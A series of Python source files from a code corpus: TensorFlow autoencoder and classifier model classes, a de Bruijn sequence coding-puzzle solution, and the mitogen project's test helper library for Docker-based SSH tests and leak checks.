        """Map input x to the 100-dim code; records self.width and self.f3_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        h = linear_layer(tf.nn.dropout(x, keep_prob), self.code + "_fc1", 200,
                         stddev='selu', wd=weight_decay, nonlinearity=selu, reuse=reuse)
        h = linear_layer(tf.nn.dropout(h, keep_prob), self.code + '_fc2', 150,
                         stddev='selu', wd=weight_decay, nonlinearity=selu, reuse=reuse)
        self.f3_out_width = 100
        return linear_layer(tf.nn.dropout(h, keep_prob), self.code + "_fc3_out",
                            self.f3_out_width, stddev='Xav', wd=weight_decay,
                            nonlinearity=None, reuse=reuse)

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the original feature vector from the 100-dim code."""
        test = not self.is_training
        h = linear_layer(x, self.code + "_de_fc1", 150, stddev='selu',
                         wd=weight_decay, nonlinearity=selu)
        h = linear_layer(h, self.code + "_de_fc2", 200, stddev='selu',
                         wd=weight_decay, nonlinearity=selu)
        out = linear_layer(h, self.code + '_de_fc3_out', self.width, stddev='Xav',
                           wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return out
class LBEXP_RELU:
    # NOTE(review): despite the "RELU" name, every layer below passes
    # nonlinearity=None, so this encoder is purely linear (three stacked
    # linear maps with dropout).  Confirm whether tf.nn.relu was intended.
    # Encoder-only model (no decoder method): 200 -> 150 -> 100-dim code.
    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for LBEXP_relu")
        self.is_training = is_training
        self.code = 'lbexprelu'

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        # Sets self.width from the incoming tensor and self.f3_out_width (100).
        # Dropout is applied to the input of every layer.
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 200, stddev='Xav', wd=weight_decay, \
            nonlinearity=None, reuse=reuse)
        fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 150, stddev='Xav', wd=weight_decay, \
            nonlinearity=None, reuse=reuse)
        self.f3_out_width = 100
        fc3_out = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+"_fc3_out", self.f3_out_width, stddev='Xav', \
            wd=weight_decay, nonlinearity=None, reuse=reuse)
        return fc3_out
class AutoEncoder_ECFP_Three_BN:
    """
    Three-layer batch-normalized autoencoder for ECFP fingerprints:
    500 -> 250 -> 100-dim code, mirrored decoder, intense_sigmoid output.
    Unlike the RNA-seq models, the feature width is supplied up front.
    """

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output.
        print("AE for ECFP_three_BN")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        """Map input x to a 100-dim code via two batch-normalized layers."""
        test = not self.is_training
        h = batch_normalized_linear_layer(x, "fc1", 500, stddev=.01, wd=weight_decay, test=test)
        h = batch_normalized_linear_layer(h, 'fc2', 250, stddev=.01, wd=weight_decay, test=test)
        return linear_layer(h, "fc3_out", 100, stddev=.01, wd=weight_decay)

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the fingerprint from a 100-dim code."""
        test = not self.is_training
        h = batch_normalized_linear_layer(x, "de_fc1", 250, stddev=.01, wd=weight_decay, test=test)
        h = batch_normalized_linear_layer(h, "de_fc2", 500, stddev=.01, wd=weight_decay, test=test)
        return linear_layer(h, 'de_fc3_out', self.width, stddev=.01,
                            wd=weight_decay, nonlinearity=intense_sigmoid)
class AutoEncoder_ECFP_Skinny_BN:
    """
    "Skinny" variant of the ECFP autoencoder: a single 100-unit
    batch-normalized hidden layer on each side of a 100-dim code.
    """

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output.
        print("AE for ECFP_three_skinny_BN")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        """Map input x to a 100-dim code via one batch-normalized layer."""
        test = not self.is_training
        h = batch_normalized_linear_layer(x, "fc1", 100, stddev=.01, wd=weight_decay, test=test)
        return linear_layer(h, "fc3_out", 100, stddev=.01, wd=weight_decay)

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the fingerprint from a 100-dim code."""
        test = not self.is_training
        h = batch_normalized_linear_layer(x, "de_fc1", 100, stddev=.01, wd=weight_decay, test=test)
        return linear_layer(h, 'de_fc3_out', self.width, stddev=.01,
                            wd=weight_decay, nonlinearity=intense_sigmoid)
class FANG_RELU_DRAGON:
    """
    Classifier trunk: three 1000-unit ReLU layers, each with dropout applied
    to its input, Xavier-initialized.
    """

    def __init__(self):
        print("classifier for fang_relu_dragon")
        self.code = 'fang_relu_dragon'

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Return the activations of the third 1000-unit ReLU layer; sets self.width."""
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        hidden = x
        for idx in (1, 2, 3):
            hidden = linear_layer(tf.nn.dropout(hidden, keep_prob),
                                  '%s_fc%d' % (self.code, idx), 1000, stddev='Xav',
                                  wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
        return hidden
class FANG_RELU_GENE:
    """
    Classifier trunk: three 1000-unit ReLU layers, each with dropout applied
    to its input, Xavier-initialized.
    """

    def __init__(self):
        print("classifier for fang_relu_gene")
        self.code = 'fang_relu_gene'

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Return the activations of the third 1000-unit ReLU layer; sets self.width."""
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        hidden = x
        for idx in (1, 2, 3):
            hidden = linear_layer(tf.nn.dropout(hidden, keep_prob),
                                  '%s_fc%d' % (self.code, idx), 1000, stddev='Xav',
                                  wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
        return hidden
class TOX_RELU:
    """
    Small ReLU classifier head: one 50-unit hidden layer feeding a 10-unit
    ReLU output, with dropout on the input of both layers.
    """

    def __init__(self, is_training=True):
        # self.width (the input feature count) is set lazily by encoder().
        print("classifier for tox_relu")
        self.is_training = is_training
        self.code = 'toxrelu'

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Return the 10-unit output activations; sets self.width and self.f4_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        hidden = linear_layer(tf.nn.dropout(x, keep_prob), self.code + "_fc1", 50,
                              stddev='Xav', wd=weight_decay,
                              nonlinearity=tf.nn.relu, reuse=reuse)
        self.f4_out_width = 10
        return linear_layer(tf.nn.dropout(hidden, keep_prob), self.code + "_fc4_out",
                            self.f4_out_width, stddev='Xav', wd=weight_decay,
                            nonlinearity=tf.nn.relu, reuse=reuse)
class TOX_RELU_REG:
    """
    Regression head: a single ReLU-activated unit applied directly to the
    input features (so predictions are clipped to be non-negative).
    """

    def __init__(self, is_training=True):
        # self.width (the input feature count) is set lazily by encoder().
        print("classifier for tox_relu_reg")
        self.is_training = is_training
        self.code = 'toxrelu_reg'

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Return a single-unit regression output; sets self.width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        # Note: no dropout and no hidden layers -- a straight 1-unit map.
        return linear_layer(x, self.code + "_reg_layer", 1, stddev='Xav',
                            wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
class RNASEQ_SELU_big:
    # NOTE(review): this REDEFINES RNASEQ_SELU_big declared earlier in the
    # file; being the later definition, it silently wins at import time.
    # The earlier version computes stddev=math.sqrt(1./fan_in) for hidden
    # layers while this one passes stddev='selu', and this one never sets
    # self.f4_out_width.  Confirm which is intended and delete the other.
    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for RNASEQ_SELU_big")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        # 5000 -> 2000 -> 400 SELU layers feeding a 200-dim linear code.
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        fc1 = linear_layer(x, "rnasb_fc1", 5000, stddev='selu', wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        fc2 = linear_layer(fc1, 'rnasb_fc2', 2000, stddev='selu', wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        fc3 = linear_layer(fc2, 'rnasb_fc3', 400, stddev='selu', wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        fc4_out = linear_layer(fc3, "rnasb_fc4_out", 200, stddev='Xav', \
            wd=weight_decay, nonlinearity=None, reuse=reuse)
        return fc4_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        # Mirrors the encoder: 400 -> 2000 -> 5000 -> self.width (linear out).
        test = not self.is_training
        de_fc1 = linear_layer(x, "rnasb_de_fc1", 400, stddev='selu', \
            wd=weight_decay, nonlinearity=selu)
        de_fc2 = linear_layer(de_fc1, "rnasb_de_fc2", 2000, stddev='selu', \
            wd=weight_decay, nonlinearity=selu)
        de_fc3 = linear_layer(de_fc2, "rnasb_de_fc3", 5000, stddev='selu', \
            wd=weight_decay, nonlinearity=selu)
        de_fc4_out = linear_layer(de_fc3, 'rnasb_de_fc4_out', self.width, stddev='Xav', \
            wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return de_fc4_out
| 40.259197 | 118 | 0.61055 |
ace8f066d478199175b053c11dc3b113064c56c1 | 1,024 | py | Python | solutions/problem_264.py | ksvr444/daily-coding-problem | 5d9f488f81c616847ee4e9e48974523ec2d598d7 | [
"MIT"
] | 1,921 | 2018-11-13T18:19:56.000Z | 2021-11-15T14:25:41.000Z | solutions/problem_264.py | MohitIndian/daily-coding-problem | 5d9f488f81c616847ee4e9e48974523ec2d598d7 | [
"MIT"
] | 2 | 2019-07-19T01:06:16.000Z | 2019-08-01T22:21:36.000Z | solutions/problem_264.py | MohitIndian/daily-coding-problem | 5d9f488f81c616847ee4e9e48974523ec2d598d7 | [
"MIT"
] | 1,066 | 2018-11-19T19:06:55.000Z | 2021-11-13T12:33:56.000Z | # NOTE: The answer in the problem description is incorrect since
# it doesn't include '100' or '110'
def generate_combos(chars, k, context=""):
    """
    Return the set of every string formed by appending ``k`` characters
    drawn (with repetition) from ``chars`` onto ``context``.
    """
    if k == 0:
        return {context}
    results = set()
    for symbol in chars:
        results.update(generate_combos(chars, k - 1, context + symbol))
    return results
def get_debruijn_seq(chars, combos, context=""):
    """
    Return the set of all linear de Bruijn-style sequences over ``chars``
    containing every string in ``combos`` exactly once as a substring.

    ``combos`` must hold equal-length strings (length ``k``).  The original
    implementation hard-coded ``k == 3`` via ``context[-2:]``; this version
    infers ``k`` from ``combos`` itself, so it also works for other lengths
    (backward compatible for the k=3 case).

    Each returned sequence has length ``k + len(combos) - 1``.  An empty
    ``combos`` yields ``{context}``.
    """
    if not combos:
        # Every combination has been consumed: context is a complete sequence.
        return set([context])
    # All combos share one length; infer k from any element.
    k = len(next(iter(combos)))
    dseqs = set()
    if not context:
        # First step: any remaining combination may start the sequence.
        for cb in combos:
            child_dseqs = get_debruijn_seq(
                chars, combos - set([cb]), cb)
            dseqs |= child_dseqs
        return dseqs
    # Extend by one character: the new trailing k-character window must be
    # an as-yet unused combination.
    suffix = context[-(k - 1):] if k > 1 else ""
    for ch in chars:
        new_cb = suffix + ch
        if new_cb in combos:
            child_dseqs = get_debruijn_seq(
                chars, combos - set([new_cb]), context + ch)
            dseqs |= child_dseqs
    return dseqs
# Tests
# Binary alphabet, subsequence length 3: every sequence produced must
# contain all 2**3 = 8 possible 3-character combinations as substrings.
c, k = {'0', '1'}, 3
combos = generate_combos(c, k)
dseqs = get_debruijn_seq(c, combos)
assert all([all([cb in ds for cb in combos]) for ds in dseqs])
| 23.272727 | 64 | 0.583984 |
ace8f0a27d696b81a213808f084e3d9be361deda | 15,939 | py | Python | tests/testlib.py | webcoast-dk/mitogen | a5fe4a9fac5561511b676fe61ed127b732be5b12 | [
"BSD-3-Clause"
] | null | null | null | tests/testlib.py | webcoast-dk/mitogen | a5fe4a9fac5561511b676fe61ed127b732be5b12 | [
"BSD-3-Clause"
] | 3 | 2021-03-26T00:43:30.000Z | 2022-03-29T22:03:58.000Z | tests/testlib.py | webcoast-dk/mitogen | a5fe4a9fac5561511b676fe61ed127b732be5b12 | [
"BSD-3-Clause"
] | null | null | null |
import logging
import os
import random
import re
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import unittest2
import mitogen.core
import mitogen.fork
import mitogen.master
import mitogen.utils
try:
import faulthandler
except ImportError:
faulthandler = None
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
BaseException
except NameError:
BaseException = Exception
# Module-level logger for the helpers in this file.
LOG = logging.getLogger(__name__)

# Test fixture directories; both are appended to sys.path below so fixture
# modules can be imported directly by tests.
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
MODS_DIR = os.path.join(DATA_DIR, 'importer')

sys.path.append(DATA_DIR)
sys.path.append(MODS_DIR)

if mitogen.is_master:
    # Only the top-level test process configures file logging; children
    # inherit whatever the master set up.
    mitogen.utils.log_to_file()

if faulthandler is not None:
    # Dump Python tracebacks on hard crashes (SIGSEGV etc.) where available.
    faulthandler.enable()

#
# Temporary hack: Operon changed logging somewhat, and this broke LogCapturer /
# log_handler_test.
#
mitogen.core.LOG.propagate = True
def get_fd_count():
    """
    Count the file descriptors currently open in this process.
    """
    # Imported lazily so psutil is only required by tests that use it.
    import psutil
    current = psutil.Process()
    return current.num_fds()
def data_path(suffix):
    """
    Return the path of the test fixture ``suffix`` under DATA_DIR,
    tightening permissions on private key files as a side effect.
    """
    full = os.path.join(DATA_DIR, suffix)
    if full.endswith('.key'):
        # SSH is funny about private key permissions.
        os.chmod(full, int('0600', 8))
    return full
def subprocess__check_output(*popenargs, **kwargs):
    # Missing from 2.6.
    # Minimal backport of subprocess.check_output() for Python 2.6: run the
    # command, capture stdout, and raise CalledProcessError on non-zero exit.
    # NOTE(review): unlike 2.7+'s check_output(), the captured output is not
    # attached to the raised exception -- 2.6's CalledProcessError does not
    # accept an output argument.
    process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
    output, _ = process.communicate()
    retcode = process.poll()
    if retcode:
        cmd = kwargs.get("args")
        if cmd is None:
            cmd = popenargs[0]
        raise subprocess.CalledProcessError(retcode, cmd)
    return output


def Popen__terminate(proc):
    # Backport of Popen.terminate() for Pythons that lack it (pre-2.6).
    os.kill(proc.pid, signal.SIGTERM)


# Prefer the real stdlib implementations whenever they exist.
if hasattr(subprocess, 'check_output'):
    subprocess__check_output = subprocess.check_output

if hasattr(subprocess.Popen, 'terminate'):
    Popen__terminate = subprocess.Popen.terminate
def wait_for_port(
        host,
        port,
        pattern=None,
        connect_timeout=0.5,
        receive_timeout=0.5,
        overall_timeout=5.0,
        sleep=0.1,
    ):
    """Attempt to connect to host/port, for upto overall_timeout seconds.
    If a regex pattern is supplied try to find it in the initial data.
    Return None on success, or raise on error.

    :param host: hostname or IP to connect to.
    :param port: TCP port number.
    :param pattern: optional bytes-compatible regex searched for in the
        server's initial output (e.g. an SSH banner).
    :param connect_timeout: per-attempt connect() timeout, seconds.
    :param receive_timeout: per-recv() timeout, seconds.
    :param overall_timeout: total time budget before socket.timeout is raised.
    :param sleep: delay between connection attempts, seconds.
    """
    start = mitogen.core.now()
    end = start + overall_timeout
    addr = (host, port)

    while mitogen.core.now() < end:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(connect_timeout)
        try:
            sock.connect(addr)
        except socket.error:
            # Failed to connect. So wait then retry.
            time.sleep(sleep)
            continue
        if not pattern:
            # Success: We connected & there's no banner check to perform.
            # FIX: was socket.SHUTD_RDWR, which does not exist and raised
            # AttributeError on this (otherwise successful) path.
            sock.shutdown(socket.SHUT_RDWR)
            sock.close()
            return

        sock.settimeout(receive_timeout)
        data = mitogen.core.b('')
        found = False
        while mitogen.core.now() < end:
            try:
                resp = sock.recv(1024)
            except socket.timeout:
                # Server stayed up, but had no data. Retry the recv().
                continue

            if not resp:
                # Server went away. Wait then retry the connection.
                time.sleep(sleep)
                break

            data += resp
            if re.search(mitogen.core.b(pattern), data):
                found = True
                break

        try:
            sock.shutdown(socket.SHUT_RDWR)
        except socket.error:
            e = sys.exc_info()[1]
            # On Mac OS X - a BSD variant - the above code only succeeds if the
            # operating system thinks that the socket is still open when
            # shutdown() is invoked. If Python is too slow and the FIN packet
            # arrives before that statement can be reached, then OS X kills the
            # sock.shutdown() statement with:
            #
            #    socket.error: [Errno 57] Socket is not connected
            #
            # Protect shutdown() with a try...except that catches the
            # socket.error, test to make sure Errno is right, and ignore it if
            # Errno matches.
            if e.errno == 57:
                pass
            else:
                raise
        sock.close()

        if found:
            # Success: We received the banner & found the desired pattern
            return
    else:
        # Failure: The overall timeout expired
        if pattern:
            raise socket.timeout('Timed out while searching for %r from %s:%s'
                                 % (pattern, host, port))
        else:
            raise socket.timeout('Timed out while connecting to %s:%s'
                                 % (host, port))
def sync_with_broker(broker, timeout=10.0):
    """
    Insert a synchronization barrier between the calling thread and the Broker
    thread, ensuring it has completed at least one full IO loop before
    returning.

    Used to block while asynchronous stuff (like defer()) happens on the
    broker.

    :param broker: the mitogen Broker to synchronize with.
    :param timeout: seconds to wait for the broker to service the barrier.
    """
    # Schedule a put() on the broker thread; get() blocks the caller until
    # the broker has executed it (i.e. drained everything deferred earlier).
    sem = mitogen.core.Latch()
    broker.defer(sem.put, None)
    sem.get(timeout=timeout)
def log_fd_calls():
    """
    Debugging aid for FD leaks: monkey-patch os.pipe, socket.socketpair,
    os.dup2 and os.dup so every call is printed to stdout along with a short
    stack trace.  Only the original process (the PID at patch time) prints;
    forked children inherit the patches but stay silent.
    """
    mypid = os.getpid()
    # Serialize FD creation and printing so interleaved traces stay readable.
    l = threading.Lock()
    real_pipe = os.pipe
    def pipe():
        l.acquire()
        try:
            rv = real_pipe()
            if mypid == os.getpid():
                sys.stdout.write('\n%s\n' % (rv,))
                traceback.print_stack(limit=3)
                sys.stdout.write('\n')
            return rv
        finally:
            l.release()
    os.pipe = pipe

    real_socketpair = socket.socketpair
    def socketpair(*args):
        l.acquire()
        try:
            rv = real_socketpair(*args)
            if mypid == os.getpid():
                sys.stdout.write('\n%s -> %s\n' % (args, rv))
                traceback.print_stack(limit=3)
                sys.stdout.write('\n')
            return rv
        finally:
            l.release()
    socket.socketpair = socketpair

    real_dup2 = os.dup2
    def dup2(*args):
        l.acquire()
        try:
            real_dup2(*args)
            if mypid == os.getpid():
                sys.stdout.write('\n%s\n' % (args,))
                traceback.print_stack(limit=3)
                sys.stdout.write('\n')
        finally:
            l.release()
    os.dup2 = dup2

    real_dup = os.dup
    def dup(*args):
        l.acquire()
        try:
            rv = real_dup(*args)
            if mypid == os.getpid():
                sys.stdout.write('\n%s -> %s\n' % (args, rv))
                traceback.print_stack(limit=3)
                sys.stdout.write('\n')
            return rv
        finally:
            l.release()
    os.dup = dup
class CaptureStreamHandler(logging.StreamHandler):
    """
    StreamHandler subclass that additionally records every LogRecord it
    handles in ``self.msgs``, so tests can assert on emitted records.
    """

    def __init__(self, *args, **kwargs):
        # Explicit base-class call (rather than super()) keeps this working
        # on ancient Python 2.x logging classes, matching the file's style.
        logging.StreamHandler.__init__(self, *args, **kwargs)
        # LogRecord objects seen so far, in emission order.
        self.msgs = []

    def emit(self, record):
        # Capture first, then write through to the underlying stream.
        self.msgs.append(record)
        logging.StreamHandler.emit(self, record)
class LogCapturer(object):
    """
    Temporarily replace the handlers of a named logger with a capturing
    handler, recording both the formatted text and the LogRecord objects.
    Usable either via explicit start()/stop() or as a context manager;
    stop() restores the logger's prior configuration.
    """

    def __init__(self, name=None):
        self.sio = StringIO()
        self.logger = logging.getLogger(name)
        self.handler = CaptureStreamHandler(self.sio)
        # Remember the logger's prior configuration so stop() can restore it.
        self.old_propagate = self.logger.propagate
        self.old_handlers = self.logger.handlers
        self.old_level = self.logger.level

    def start(self):
        """Install the capturing handler and open the logger to DEBUG."""
        self.logger.handlers = [self.handler]
        self.logger.propagate = False
        self.logger.level = logging.DEBUG

    def raw(self):
        """Return everything logged so far as unicode text."""
        text = self.sio.getvalue()
        # Python 2.x logging package hard-wires UTF-8 output.
        if isinstance(text, mitogen.core.BytesType):
            return text.decode('utf-8')
        return text

    def msgs(self):
        """Return the captured LogRecord objects."""
        return self.handler.msgs

    def __enter__(self):
        self.start()
        return self

    def __exit__(self, _1, _2, _3):
        self.stop()

    def stop(self):
        """Restore the logger's original configuration and return raw()."""
        self.logger.level = self.old_level
        self.logger.handlers = self.old_handlers
        self.logger.propagate = self.old_propagate
        return self.raw()
class TestCase(unittest2.TestCase):
    # Base test case that, after every test, verifies the test leaked no
    # threads, file descriptors or child processes.

    @classmethod
    def setUpClass(cls):
        # This is done in setUpClass() so we have a chance to run before any
        # Broker() instantiations in setUp() etc.
        mitogen.fork.on_fork()
        cls._fd_count_before = get_fd_count()
        super(TestCase, cls).setUpClass()

    # Thread names permitted to remain alive after a test finishes.
    ALLOWED_THREADS = set([
        'MainThread',
        'mitogen.master.join_thread_async'
    ])

    def _teardown_check_threads(self):
        # Fail if any unexpected or duplicate thread survived the test.
        # NOTE(review): getName()/isAlive() are the legacy camelCase APIs
        # (kept for Python 2.4); isAlive() was removed in Python 3.9 --
        # confirm the supported interpreter range before modernizing.
        counts = {}
        for thread in threading.enumerate():
            name = thread.getName()
            # Python 2.4: enumerate() may return stopped threads.
            assert (not thread.isAlive()) or name in self.ALLOWED_THREADS, \
                'Found thread %r still running after tests.' % (name,)
            counts[name] = counts.get(name, 0) + 1

        for name in counts:
            assert counts[name] == 1, \
                'Found %d copies of thread %r running after tests.' % (
                    counts[name], name
                )

    def _teardown_check_fds(self):
        # Compare the process FD count against the snapshot from
        # setUpClass(); dump lsof output on mismatch to aid debugging.
        mitogen.core.Latch._on_fork()
        if get_fd_count() != self._fd_count_before:
            import os; os.system('lsof +E -w -p %s | grep -vw mem' % (os.getpid(),))
            assert 0, "%s leaked FDs. Count before: %s, after: %s" % (
                self, self._fd_count_before, get_fd_count(),
            )

    # Some class fixtures (like Ansible MuxProcess) start persistent children
    # for the duration of the class.
    no_zombie_check = False

    def _teardown_check_zombies(self):
        # Fail if the test left behind an unreaped (zombie) or still-running
        # child process.
        if self.no_zombie_check:
            return

        try:
            pid, status = os.waitpid(0, os.WNOHANG)
        except OSError:
            return  # ECHILD: no children at all, nothing leaked.
        if pid:
            assert 0, "%s failed to reap subprocess %d (status %d)." % (
                self, pid, status
            )

        # waitpid() returned (0, 0): children exist but none have exited,
        # i.e. something is still running.
        print('')
        print('Children of unit test process:')
        os.system('ps uww --ppid ' + str(os.getpid()))
        assert 0, "%s leaked still-running subprocesses." % (self,)

    def tearDown(self):
        # Ordering matters: reap children before counting threads and FDs.
        self._teardown_check_zombies()
        self._teardown_check_threads()
        self._teardown_check_fds()
        super(TestCase, self).tearDown()

    def assertRaises(self, exc, func, *args, **kwargs):
        """Like regular assertRaises, except return the exception that was
        raised. Can't use context manager because tests must run on Python2.4"""
        try:
            func(*args, **kwargs)
        except exc:
            e = sys.exc_info()[1]
            return e
        except BaseException:
            LOG.exception('Original exception')
            e = sys.exc_info()[1]
            assert 0, '%r raised %r, not %r' % (func, e, exc)
        assert 0, '%r did not raise %r' % (func, exc)
def get_docker_host():
    """
    Return the host on which the Docker daemon (and therefore any published
    container port) is reachable, derived from $DOCKER_HOST.  Defaults to
    'localhost' when unset or pointing at the local UNIX socket.
    """
    url = os.environ.get('DOCKER_HOST')
    local_markers = (None, 'http+docker://localunixsocket')
    if url in local_markers:
        return 'localhost'
    netloc = urlparse.urlparse(url).netloc
    host, _, _port = netloc.partition(':')
    return host
class DockerizedSshDaemon(object):
    # Launch a disposable Docker container running sshd for integration
    # tests, exposing its published SSH port, and remove it via close().

    def _get_container_port(self):
        # Parse `docker port` output to find the host port mapped to
        # container port 22/tcp; stores self.port and self.host.
        # NOTE(review): PORT_RE.match() returns None for any line that does
        # not match, which would raise AttributeError on .groups() -- confirm
        # `docker port` never emits such lines on the supported versions.
        s = subprocess__check_output(['docker', 'port', self.container_name])
        for line in s.decode().splitlines():
            dport, proto, baddr, bport = self.PORT_RE.match(line).groups()
            if dport == '22' and proto == 'tcp':
                self.port = int(bport)

        self.host = self.get_host()
        if self.port is None:
            raise ValueError('could not find SSH port in: %r' % (s,))

    def start_container(self):
        # Skip the whole test when docker isn't installed, then start a
        # randomly-named privileged container with all ports published.
        try:
            subprocess__check_output(['docker', '--version'])
        except Exception:
            raise unittest2.SkipTest('Docker binary is unavailable')

        self.container_name = 'mitogen-test-%08x' % (random.getrandbits(64),)
        args = [
            'docker',
            'run',
            '--detach',
            '--privileged',
            '--publish-all',
            '--name', self.container_name,
            self.image,
        ]
        subprocess__check_output(args)
        self._get_container_port()

    def __init__(self, mitogen_test_distro=os.environ.get('MITOGEN_TEST_DISTRO', 'debian')):
        # The distro string may carry a '-py3' style suffix selecting the
        # Python interpreter path inside the container, e.g. 'debian-py3'.
        # NOTE: the default is captured from the environment once, at class
        # definition time (standard Python default-argument behaviour).
        if '-' in mitogen_test_distro:
            distro, _py3 = mitogen_test_distro.split('-')
        else:
            distro = mitogen_test_distro
            _py3 = None

        if _py3 == 'py3':
            self.python_path = '/usr/bin/python3'
        else:
            self.python_path = '/usr/bin/python'

        self.image = 'mitogen/%s-test' % (distro,)

        # 22/tcp -> 0.0.0.0:32771
        self.PORT_RE = re.compile(r'([^/]+)/([^ ]+) -> ([^:]+):(.*)')
        self.port = None

        self.start_container()

    def get_host(self):
        # Host on which the published port is reachable (see get_docker_host()).
        return get_docker_host()

    def wait_for_sshd(self):
        # Block until sshd inside the container answers with its banner.
        wait_for_port(self.get_host(), self.port, pattern='OpenSSH')

    def check_processes(self):
        # Assert the container is back to its idle state: exactly one sshd
        # plus the `ps` we just ran.
        args = ['docker', 'exec', self.container_name, 'ps', '-o', 'comm=']
        counts = {}
        for comm in subprocess__check_output(args).decode().splitlines():
            comm = comm.strip()
            counts[comm] = counts.get(comm, 0) + 1

        if counts != {'ps': 1, 'sshd': 1}:
            assert 0, (
                'Docker container %r contained extra running processes '
                'after test completed: %r' % (
                    self.container_name,
                    counts
                )
            )

    def close(self):
        # Force-remove the container (also kills any processes inside it).
        args = ['docker', 'rm', '-f', self.container_name]
        subprocess__check_output(args)
class BrokerMixin(object):
    """Mixin supplying a fresh Broker for every test.

    tearDown() shuts the broker down unless the test already did so and
    recorded that fact by setting :attr:`broker_shutdown`.
    """
    broker_class = mitogen.master.Broker
    # Set truthy by tests that shut the broker down themselves.
    broker_shutdown = False

    def setUp(self):
        super(BrokerMixin, self).setUp()
        self.broker = self.broker_class()

    def tearDown(self):
        if not self.broker_shutdown:
            self.broker.shutdown()
        self.broker.join()
        del self.broker
        super(BrokerMixin, self).tearDown()

    def sync_with_broker(self):
        # Delegate to the module-level helper of the same name.
        sync_with_broker(self.broker)
class RouterMixin(BrokerMixin):
    """BrokerMixin that additionally provides a Router bound to the broker."""
    router_class = mitogen.master.Router

    def setUp(self):
        super(RouterMixin, self).setUp()
        self.router = self.router_class(self.broker)

    def tearDown(self):
        del self.router
        super(RouterMixin, self).tearDown()
class DockerMixin(RouterMixin):
    """RouterMixin that also provisions a dockerized sshd for the test class.

    Container startup is expensive, so it happens once per class in
    setUpClass() and is torn down in tearDownClass().
    """
    @classmethod
    def setUpClass(cls):
        super(DockerMixin, cls).setUpClass()
        if os.environ.get('SKIP_DOCKER_TESTS'):
            raise unittest2.SkipTest('SKIP_DOCKER_TESTS is set')
        # we want to be able to override test distro for some tests that need
        # a different container spun up
        daemon_args = {}
        if hasattr(cls, 'mitogen_test_distro'):
            daemon_args['mitogen_test_distro'] = cls.mitogen_test_distro
        cls.dockerized_ssh = DockerizedSshDaemon(**daemon_args)
        cls.dockerized_ssh.wait_for_sshd()

    @classmethod
    def tearDownClass(cls):
        # Verify the container is clean before removing it.
        cls.dockerized_ssh.check_processes()
        cls.dockerized_ssh.close()
        super(DockerMixin, cls).tearDownClass()

    def docker_ssh(self, **kwargs):
        """Open an SSH connection to the test container.

        Caller-supplied kwargs win; sensible defaults fill in the
        container's host/port, python path, and test-friendly SSH options.
        """
        kwargs.setdefault('hostname', self.dockerized_ssh.host)
        kwargs.setdefault('port', self.dockerized_ssh.port)
        kwargs.setdefault('check_host_keys', 'ignore')
        kwargs.setdefault('ssh_debug_level', 3)
        kwargs.setdefault('python_path', self.dockerized_ssh.python_path)
        return self.router.ssh(**kwargs)

    def docker_ssh_any(self, **kwargs):
        """docker_ssh() as a passwordless-sudo-capable test account.

        Fix: previously any **kwargs passed by the caller were silently
        discarded; they are now forwarded, with the test account's
        username/password applied only as defaults.
        """
        kwargs.setdefault('username', 'mitogen__has_sudo_nopw')
        kwargs.setdefault('password', 'has_sudo_nopw_password')
        return self.docker_ssh(**kwargs)
| 28.927405 | 107 | 0.583851 |
ace8f108b382b87dd89546e9373c356d4d55e754 | 8,716 | py | Python | src/masoniteorm/migrations/Migration.py | alfonsocv12/orm | 87b2532c7673a28c143600329df68e0343607f55 | [
"MIT"
